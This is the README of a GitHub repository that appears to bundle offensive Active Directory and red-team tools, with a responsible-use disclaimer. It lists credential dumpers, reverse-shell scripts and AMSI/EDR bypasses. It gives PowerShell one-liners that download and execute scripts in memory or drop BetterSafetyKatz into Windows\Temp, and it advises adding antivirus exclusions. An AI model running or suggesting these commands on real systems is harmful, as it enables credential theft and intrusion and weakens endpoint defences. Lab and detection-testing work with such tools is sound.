Skip to content

RealFadyMoheb/RedForest-Toolkit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

55 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

RedForest Toolkit

A curated toolkit of utilities, executables, PowerShell scripts, DLLs, and reference notes gathered to support Active Directory research, red teaming lab work, and defensive testing in isolated environments.


Warning / Responsible Use

This repository contains offensive security tools and potentially dangerous binaries. Use only in environments you own or where you have explicit written authorization. Do not run these tools on production systems, customer networks, or any environment where you lack permission. Follow all applicable laws, organizational policies, and responsible disclosure practices.

Run everything in a safe, isolated lab (e.g., air-gapped VMs, snapshots you can revert) and verify file integrity (hashes, vendor/source) before execution.


Instructions of Use

To get started with the RedForest Toolkit, follow these steps:

1. Recursive Cloning

Since this repository relies on multiple sub-projects and external modules, a standard clone is not enough. Ensure you fetch everything by using the --recursive flag:

git clone --recursive https://github.com/RealFadyMoheb/RedForest-Toolkit.git

2. Environment Setup

  • Isolated Lab: Always run these tools in a dedicated, non-connected lab environment.
  • Exclusions: You may need to add AV/EDR exclusions for the toolkit directory, as many of these tools are flagged by design.
  • Dependencies: Check the Python/ and PowerShell/ directories for specific script requirements (e.g., pip install for Impacket modules).

3. Remote Loading & Deployment

For quick deployment during testing, you can load PowerShell scripts directly into memory or download executables using the following PowerShell commands:

Import a PowerShell script (e.g., Get-LAPSPermissions):

iex (New-Object Net.Webclient).DownloadString("https://raw.githubusercontent.com/RealFadyMoheb/RedForest-Toolkit/main/PowerShell/Get-LAPSPermissions.ps1")

Download an executable (e.g., BetterSafetyKatz):

(New-Object Net.WebClient).DownloadFile("https://raw.githubusercontent.com/RealFadyMoheb/RedForest-Toolkit/main/EXE/BetterSafetyKatz.exe", "C:\Windows\Temp\BetterSafetyKatz.exe")

4. Exploration

Navigate through the categorized folders (EXE, PowerShell, dlls, etc.) to find the tools relevant to your current research or testing objective.


Repository contents (directory tree)

  • dlls/
    • libeay32.dll
    • PowerShdll_x64.dll
    • PowerShdll_x86.dll
    • SeBackupPrivilegeCmdLets.dll
    • SeBackupPrivilegeUtils.dll
    • ssleay32.dll
  • EXE/
    • BetterSafetyKatz.exe
    • bypass-clm.exe
    • DefenderSwitch.exe
    • Farmer.exe
    • Fertiliser.exe
    • GoldenGMSA.exe
    • HarvestCrop.exe
    • Hello.exe
    • Hello_Bypass.exe
    • hfs.exe
    • LaZagne.exe
    • Loader.exe
    • MDE_Enum.exe
    • mimikatz-x64.exe
    • mimikatz-win32.exe
    • MS-RPRN.exe
    • nc64.exe
    • NimExec.exe
    • Power_Bypass.exe
    • RawCopy.exe
    • RawCopy64.exe
    • Rubeus.exe
    • SafetyKatz.exe
    • SandboxDefender.exe
    • sqlcmd.exe
    • SQLRecon.exe
    • Sysmon.exe
    • Sysmon64.exe
    • Transcription_Bypass.exe
    • Watson.exe
    • Whisker.exe
    • SharpChrome.exe
    • SharpDPAPI.exe
    • SharpSecDump.exe
    • SharpUserIP.exe
    • Snaffler.exe
    • hfs.exe
    • ntfsDump.exe
    • SharpRDP.exe
    • CleanRunMRU.exe
    • RemoteSessionEnum.exe
    • SharpView.exe
    • adfind.exe
    • ADExplorer64.exe
  • PowerShell/
    • ADACLScan.ps1
    • adconnect.ps1
    • ASREPRoast.ps1
    • CIPolicyParser.ps1
    • defender.ps1
    • DomainPasswordSpray.ps1
    • EnableAllTokenPrivs.ps1
    • Envrandomizer.ps1
    • ExpandDefenderSig.ps1
    • Find-PSRemotingLocalAdminAccess.ps1
    • Find-WMILocalAdminAccess.ps1
    • Get-LAPSPermissions.ps1
    • Get-MSSQLLinkPasswords.psm1
    • Import-ActiveDirectory
    • Inveigh.ps1
    • Invoke-ADSDPropagation.ps1
    • Invoke-DCSync.ps1
    • Invoke-EDRChecker.ps1
    • Invoke-Encode.ps1
    • Invoke-GMSAPasswordReader.ps1
    • Invoke-HoneypotBuster.ps1
    • Invoke-Mimi.ps1
    • Invoke-Mimikatz.ps1
    • Invoke-Mimikatz_old.ps1
    • Invoke-noPac.ps1
    • Invoke-Phant0m.ps1
    • Invoke-PowerShellTcp.ps1
    • Invoke-PowerShellTcpEx.ps1
    • Invoke-PowerShellTcpOneLine.ps1
    • Invoke-PowerShellTcp_Old.ps1
    • Invoke-SDPropagator.ps1
    • Invoke-SDPropagator.ps1.1
    • Invoke-SessionHunter.ps1
    • Invoke-SharpDPAPI.ps1
    • Invoke-SqlServer-Persist-StartupSp.psm1
    • jaws-enum.ps1
    • Nikhil_rev.ps1
    • Old_PowerView.ps1
    • powercat.ps1
    • PowerGPOAbuse.ps1
    • Powermad.ps1
    • PowerUpSQL.ps1
    • PowerUp_Old.ps1
    • PowerView.ps1
    • Pre2kSpray.ps1
    • PrivescCheck.ps1
    • PSUpload.ps1
    • RACE.ps1
    • ServerUntrustAccount.ps1
    • SessionGopher.ps1
    • Set-DCShadowPermissions.ps1
    • Set-TokenPrivilege.ps1
    • SharpHound.ps1
    • winPEAS.ps1
    • Invoke-SharpSecDump.ps1
    • SpoolerScan.ps1
    • Invoke-NinjaCopy.ps1
    • UnderlayCopy.ps1
    • Find-LocalAdminAccess.ps1
    • PatchRDP.ps1
  • Python/
    • Impacket
    • PowerView.py
    • LdapRelayScan.py
  • txt/
    • Amsi.txt
    • sbloggingbypass.txt

What this toolkit is for

  • Research & learning: quick access to binaries and scripts commonly referenced in AD research and red-team demos.
  • Lab work: reproduce scenarios in isolated test domains to learn detection and mitigation.
  • Defensive development: defenders can use these artifacts (in a safe lab) to validate detections, telemetry, and alerting logic.

License & disclaimer

This repository is provided AS IS for research, education, and defensive testing only. The maintainers are not responsible for misuse. By using these materials you agree to comply with applicable laws and ethical guidelines. Consider adding a specific license file (e.g., MIT, or a responsible-use / prohibited-use clause) that matches your intent.


About

This repository gathers vetted scripts and snippets across several programming languages for use in penetration testing and Capture the Flag (CTF) challenges. Designed as a learning and practice resource, it includes practical examples, utility scripts, and short labs to help security researchers.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors